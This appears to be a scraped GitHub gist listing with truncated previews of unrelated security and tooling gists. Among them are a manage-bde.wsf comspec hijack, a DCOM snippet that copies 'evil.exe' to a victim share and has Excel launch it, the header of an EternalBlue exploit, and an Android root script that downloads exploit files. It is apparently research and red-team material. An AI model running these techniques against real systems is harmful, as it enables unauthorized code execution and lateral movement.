This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
Here are a few examples that you may or may not find useful - | |
1) Replace ComSpec Variable | |
set comspec=c:\windows\system32\calc.exe | |
cscript manage-bde.wsf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# IMPORTANT! | |
# This gist has been transformed into a github repo | |
# You can find the most recent version there: | |
# https://github.com/Neo23x0/auditd | |
# ___ ___ __ __ | |
# / | __ ______/ (_) /_____/ / | |
# / /| |/ / / / __ / / __/ __ / | |
# / ___ / /_/ / /_/ / / /_/ /_/ / | |
# /_/ |_\__,_/\__,_/_/\__/\__,_/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
typedef interface IFwCplLua IFwCplLua; | |
typedef struct IFwCplLuaInterfaceVtbl { | |
BEGIN_INTERFACE | |
HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
__RPC__in IFwCplLua * This, | |
__RPC__in REFIID riid, | |
_COM_Outptr_ void **ppvObject); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111")) | |
# Windows 10 specific, but searches PATH so .. | |
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE | |
$excel.ActivateMicrosoftApp("5") | |
# excel executes your binary :) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SignatureOwner | SHA256Hash | |
---|---|---|
00000000-0000-0000-0000-000000000000 | 6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | 80B4D96931BF0D02FD91A61E19D14F1DA452E66DB2408CA8604D411F92659F0A | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | F52F83A3FA9CFBD6920F722824DBE4034534D25B8507246B3B957DAC6E1BCE7A | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | C5D9D8A186E2C82D09AFAA2A6F7F2E73870D3E64F72C4E08EF67796A840F0FBD | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | 363384D14D1F2E0B7815626484C459AD57A318EF4396266048D058C5A19BBF76 | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | 1AEC84B84B6C65A51220A9BE7181965230210D62D6D33C48999C6B295A2B0A06 | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | E6CA68E94146629AF03F69C2F86E6BEF62F930B37C6FBCC878B78DF98C0334E5 | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | C3A99A460DA464A057C3586D83CEF5F4AE08B7103979ED8932742DF0ED530C66 | |
77fa9abd-0359-4d32-bd60-28f4e78f784b | 58FB941AEF95A25943B3FB5F2510A0DF3FE44C58C95E0AB80487297568AB9771 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# small tool to retreive vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login) | |
# sudo apt install curl | |
parse(){ | |
local IFS=\> | |
read -d \< CELL VALUE | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb, ntlm | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#region Step #1 (optional): Salvaging of drivers | |
# I had to manually install a disk and network driver the last time I installed Nano Server. | |
# I saved my previous WIM file and exported the installed drivers using the Dism cmdlets. | |
# These paths are specific to my system. | |
# This was my old Nano Server TP5 image. | |
$NanoTP5ImagePath = 'C:\Users\Matt\Desktop\Temp\NanoTP5Setup\NanoServerBin\NanoServer.wim' | |
$WimTempMountDir = 'C:\Users\Matt\Desktop\TempMountDir' | |
$ExportedDriverDir = 'C:\Users\Matt\Desktop\ExportedDrivers' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Scramble/descramble raw NAND dumps from the NES Classic. | |
plutoo 2016 | |
Cheers to brizzo, derrek. | |
*/ | |
#include <stdio.h> | |
#include <string.h> | |
#include <stdint.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Give the usual warning. | |
clear; | |
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
sleep 10; | |
clear; | |
# Download and extract exploit files. | |
echo "[INFO] Downloading exploit files from GitHub..."; |
NewerOlder